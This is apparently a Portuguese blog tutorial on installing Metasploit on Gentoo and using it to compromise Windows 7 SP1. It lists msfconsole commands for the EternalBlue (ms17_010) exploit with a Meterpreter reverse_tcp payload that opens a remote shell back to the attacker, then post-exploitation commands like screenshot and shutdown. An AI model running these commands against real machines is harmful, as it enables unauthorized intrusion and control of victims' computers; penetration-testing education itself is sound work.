Introdução
O
Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração.
É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts que possui diversos softwares (Opcode - Banco de Dados; e o Shellcode, que executa comandos de Shell Script, ...), entre eles o mais conhecido que é o Metasploit Framework, um software de código aberto uma ferramenta para explorar falhas de uma máquina remota.
O Metasploit possui 6 tipos de módulos (auxiliary, exploit, payload, post, encoder e nop). No vídeo apresentado por nós vamos utilizar o
Meterpreter, que é um payload avançado.
Instalação
Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site
metasploit.com ou pelo
GitHub. Ou instalando via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição que eu utilizo Gentoo basta realizar os comandos abaixo:
# emerge -a net-analyzer/metasploit \
dev-ruby/metasploit_payloads-mettle \
dev-ruby/metasploit_data_models \
dev-ruby/metasploit-payloads \
dev-ruby/metasploit-model \
dev-ruby/metasploit-credential \
dev-ruby/metasploit-concern \
app-eselect/eselect-metasploit
O comando acima irá pedir para atualizar o package.use por conta das flags, então rode o comando:
# etc-update --automode -5
E então rode o comando de instalação novamente.
Após instalação, talvez você não encontre o comando msfconsole responsável por abrir o Metasploit, então crie um link simbólico com o root ou sudo, com o comando abaixo:
# ln -s /usr/lib64/metasploit4.17/msfconsole /usr/bin/msfconsole
E pronto, o Metasploit está pronto para uso! Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali
Linux entre outras criadas especialmente para testes de invasão.
Próximo passo é rodar o Metasploit rodando o comando:
# msfconsole
Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows, basta rodar os comandos abaixo na ordem:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit
Lembrando que esses comandos são a grosso modo e servem para Windows 7 Service Pack 1, para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.
Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:\windows\system32*; desligar, reiniciar,... entre vários comando que podem ser consultado pelo comando help.
Assista ao vídeo:
Links Úteis
Abraços!
Nenhum comentário foi encontrado.